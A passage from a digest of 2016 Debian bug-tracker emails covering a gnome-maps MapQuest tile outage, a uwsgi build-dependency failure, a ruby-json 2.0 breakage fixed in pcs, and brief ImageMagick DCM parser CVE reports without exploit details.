misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
830842: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830842
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gnome-maps
Version: 3.20.1-1
Severity: important

Dear Maintainer,

Map tiles are replaced by a MapQuest message warning that direct tile access
has been discontinued.



-- System Information:
Debian Release: stretch/sid
  APT prefers testing
  APT policy: (900, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.6.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages gnome-maps depends on:
ii  dconf-gsettings-backend [gsettings-backend]  0.26.0-1
ii  geoclue-2.0  2.4.3-1
ii  gir1.2-champlain-0.120.12.13-1
ii  gir1.2-clutter-1.0   1.26.0-2
ii  gir1.2-cogl-1.0  1.22.0-2
ii  gir1.2-gdkpixbuf-2.0 2.34.0-1
ii  gir1.2-geoclue-2.0   2.4.3-1
ii  gir1.2-geocodeglib-1.0   3.20.1-1
ii  gir1.2-gfbgraph-0.2  0.2.3-1
ii  gir1.2-glib-2.0  1.48.0-2
ii  gir1.2-goa-1.0   3.20.1-1
ii  gir1.2-gtk-3.0   3.20.6-2
ii  gir1.2-gtkchamplain-0.12 0.12.13-1
ii  gir1.2-gtkclutter-1.01.8.0-1
ii  gir1.2-gweather-3.0  3.20.1-1
ii  gir1.2-rest-0.7  0.8.0-1
ii  gir1.2-secret-1  0.18.3-1
ii  gir1.2-soup-2.4  2.54.1-1
ii  gir1.2-webkit2-4.0   2.12.3-1
ii  gjs  1.45.3-2
ii  libatk1.0-0  2.20.0-1
ii  libc62.22-13
ii  libcairo-gobject21.14.6-1+b1
ii  libcairo21.14.6-1+b1
ii  libchamplain-0.12-0  0.12.13-1
ii  libclutter-1.0-0 1.26.0-2
ii  libcogl-pango20  1.22.0-2
ii  libcogl-path20   1.22.0-2
ii  libcogl201.22.0-2
ii  libdrm2  2.4.68-1
ii  libegl1-mesa [libegl1-x11]   11.2.2-1
ii  libfolks25   0.11.2-1
ii  libgbm1  11.2.2-1
ii  libgdk-pixbuf2.0-0   2.34.0-1
ii  libgee-0.8-2 0.18.0-2
ii  libgeocode-glib0 3.20.1-1
ii  libglib2.0-0 2.48.1-1
ii  libgtk-3-0   3.20.6-2
ii  libjson-glib-1.0-0   1.2.0-1
ii  libpango-1.0-0   1.40.1-1
ii  libpangocairo-1.0-0  1.40.1-1
ii  librest-0.7-00.8.0-1
ii  libsoup2.4-1 2.54.1-1
ii  libwayland-client0   1.11.0-2
ii  libwayland-cursor0   1.11.0-2
ii  libwayland-egl1-mesa [libwayland-egl1]   11.2.2-1
ii  libwayland-server0   1.11.0-2
ii  libx11-6 2:1.6.3-1
ii  libxcomposite1   1:0.4.4-1
ii  libxdamage1  1:1.1.4-2+b1
ii  libxext6 2:1.3.3-1
ii  libxfixes3   1:5.0.2-1
ii  libxi6   2:1.7.6-1
ii  libxkbcommon00.5.0-1
ii  libxml2  2.9.3+dfsg1-1.2
ii  libxrandr2   2:1.5.0-1

gnome-maps recommends no packages.

gnome-maps suggests no packages.

-- no debconf information
--- End Message ---
--- Begin Message ---
Source: gnome-maps
Source-Version: 3.20.2-1

We believe that the bug you reported is fixed in the latest version of
gnome-maps, which is due to be installed 

Processed: limit source to gnome-maps, tagging 830842

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source gnome-maps
Limiting to bugs with field 'source' containing at least one of 'gnome-maps'
Limit currently set to 'source':'gnome-maps'

> tags 830842 + pending
Bug #830842 [gnome-maps] gnome-maps: MapQuest direct tile access has been 
discontinued
Ignoring request to alter tags of bug #830842 to the same tags previously set
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
830842: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830842
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: limit source to gnome-maps, tagging 830842

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source gnome-maps
Limiting to bugs with field 'source' containing at least one of 'gnome-maps'
Limit currently set to 'source':'gnome-maps'

> tags 830842 + pending
Bug #830842 [gnome-maps] gnome-maps: MapQuest direct tile access has been 
discontinued
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
830842: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830842
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#833055: uwsgi: B-D mongodb-dev is no longer built by mongodb

[Andreas Beckmann]

Source: uwsgi
Version: 2.0.12-7
Severity: serious
Justification: fails to build from source (but built successfully in the past)

Hi,

uwsgi has Build-Depends: mongodb-dev, but that package is no longer built:

mongodb (1:2.6.11-1) experimental; urgency=medium
...
  * d/control:
+ Drop the mongodb-dev binary package. The C++ client library is now
  developed separately from the mongo database server.
...
 -- Apollon Oikonomopoulos   Tue, 15 Mar 2016 14:32:18 +

Please switch to a suitable alternative (there are several mongodb
client library packages available).


Andreas

Bug#832172: marked as done (Unable to parse pcs_settings file: tests fail with ruby-json 2.0)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 10:05:22 +
with message-id 
and subject line Bug#832172: fixed in pcs 0.9.153-2
has caused the Debian Bug report #832172,
regarding Unable to parse pcs_settings file: tests fail with ruby-json 2.0
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
832172: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832172
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
package: ruby-json
version: 2.0.1+dfsg-1
severity: grave

ruby-json upload just broke rails and a whole lot of dependencies.

The following packages have unmet dependencies:
 ruby-activesupport : Depends: ruby-json (< 2.0) but 2.0.1+dfsg-1 is to
be installed

One sample failure
https://ci.debian.net/data/packages/unstable/amd64/r/ruby-validate-url/latest-autopkgtest/log.gz

We need to test compatibility of all these reverse dependencies. It
would have been much better if we tested these _before_ the upload.

$ apt-cache rdepends ruby-json|uniq
ruby-json
Reverse Depends:
  ruby-swd
  whatweb
  tdiary
 |shelr
  ruby-twitter-oauth
  ruby-tinder
  ruby-activesupport
  ruby-source-map
  ruby-simplecov
  ruby-sidekiq
  ruby-sequel
  ruby-sdoc
  ruby-ridley
  ruby-rabl-rails
  ruby-rabl
  ruby-openstack
  ruby-omniauth-twitter
  ruby-json-schema
  ruby-influxdb
  ruby-gon
  ruby-gemojione
  ruby-gelf
  ruby-fog-libvirt
  ruby-azure
  ruby-aws-sdk
  ruby-autoprefixer-rails
  ruby-asetus
  ruby-appraiser
  how-can-i-help
  ruby-activesupport
  r10k
  pcs
  opennebula-context
  opennebula-sunstone
  opennebula-gate
  opennebula-flow
  mikutter
  mcollective-common
  librarian-puppet
  coquelicot
  hiera
  gist
  fencing-agent
  fuel-nailgun-agent
  foremancli
  facter
  diaspora



signature.asc
Description: OpenPGP digital signature
--- End Message ---
--- Begin Message ---
Source: pcs
Source-Version: 0.9.153-2

We believe that the bug you reported is fixed in the latest version of
pcs, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 832...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Valentin Vidic  (supplier of updated pcs package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Sat, 30 Jul 2016 11:28:50 +0200
Source: pcs
Binary: pcs
Architecture: source all
Version: 0.9.153-2
Distribution: unstable
Urgency: medium
Maintainer: Debian HA Maintainers 

Changed-By: Valentin Vidic 
Description:
 pcs- Pacemaker Configuration System
Closes: 832172
Changes:
 pcs (0.9.153-2) unstable; urgency=medium
 .
   * Fix package description
   * Drop unused dependencies: ruby-thor, ruby-tilt
   * Re-enable the upstream init script
   * Fix test fail with ruby-json 2.0 (Closes: #832172)
   * Avoid depending on thread finish order in tests
Checksums-Sha1:
 a43faec2882ef00378dd9af6beb5d372cd3bdf6b 2144 pcs_0.9.153-2.dsc
 15cb396afd13a81fc4f094d4e0c39bfae5dae3d8 164228 pcs_0.9.153-2.debian.tar.xz
 db473e556e39f67ade2d48b7960318c893bc7dc7 996488 pcs_0.9.153-2_all.deb
Checksums-Sha256:
 a2eed0275a55601dfe86465d8c997672ac9600ecfd80067d9cfbecdad268f2a6 2144 
pcs_0.9.153-2.dsc
 e1a730e328f403b51881537d760299ef33a9bee61b658051f064bdcd08ae8dc9 164228 
pcs_0.9.153-2.debian.tar.xz
 f051cd5dca8b7b260bbf8ee8ba005056eb2c518a241abbd0d8886e2ce92b3f0e 996488 
pcs_0.9.153-2_all.deb
Files:
 a7961f621a398ff3f4858200c15c9cb9 2144 admin extra pcs_0.9.153-2.dsc
 eedceb7ab89e23a035caed12185b010a 164228 admin extra pcs_0.9.153-2.debian.tar.xz
 cfce0af1c959054f19c63ad0db3e35c6 996488 admin extra pcs_0.9.153-2_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJXncLuAAoJEGH3mF24TgsE9YUQAMYbh5wqxEur2KYbg6pWxfNg
4dJm5/vvaVoW6MmS+OmXHoEbGii9TARjDvL8+nXpoAZXgd7A4NMDAjETDlc8yOzn
OTDJXOObYv6tRWw7fOq4PrUqWLX+hvlUkwcItMCiRYaeOhsLIyUS202DJLMG53T8
6uBE8204gLJX/xC6/DOKtfmeAAN2rSptErOTDJw7rljulfD/x4LEYyjAt11lwCXU
691e3i1ky0OYfNpxnvMsepNYqGxKwudZqj/+50ZN6wmxa5KoWUp+sEU4/AbNt3uT
Zb8P96wf5X7WHEYctN92CtYAaxGlR569RTsCd72QcKjwy5rT4w1miW96CXr0ljQu
N3D1/YrtfOYG/DjZMV6QTtWQZdjhPiI1820/QrLCL7qNmnsoJOmms62pcvZZY/DW

Bug#833044: CVE-2016-5691 DCM file bug lack of validation of pixel.red, pixel.green, and pixel.blue

[Bastien ROUCARIES]

Package: src:imagemagick
Version: 8:6.7.7.10-5
Severity: grave
Tags: patch security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org

lack of validation of pixel.red, pixel.green, and pixel.blue

error in the for statement in the "Compute pixel scaling table" part
of the ReadDCMImage function

This is the same fix upstream than CVE-2016-5689

Bug#833043: CVE-2016-5690

[Bastien ROUCARIES]

Package: src:imagemagick
Version: 8:6.7.7.10-5
Severity: grave
Tags: patch security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org

error in the for statement in the "Compute pixel scaling table" part
of the ReadDCMImage function

This is the same fix upstream than CVE-2016-5689

Processed: CVE-2016-5689 lack of required NULL pointer checks in the DCM parser

[Debian Bug Tracking System]

Processing control commands:

> fixed -1 6.9.4-3
Bug #833042 [src:imagemagick] CVE-2016-5689 lack of required NULL pointer 
checks in the DCM parser
The source 'imagemagick' and version '6.9.4-3' do not appear to match any 
binary packages
Marked as fixed in versions imagemagick/6.9.4-3.

-- 
833042: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833042
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#833042: CVE-2016-5689 lack of required NULL pointer checks in the DCM parser

[Bastien ROUCARIES]

Package: src:imagemagick
Version: 8:6.7.7.10-5
Severity: grave
Tags: patch security
control: fixed -1 6.9.4-3
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org


CVE-2016-5689 lack of required NULL pointer checks in the DCM parser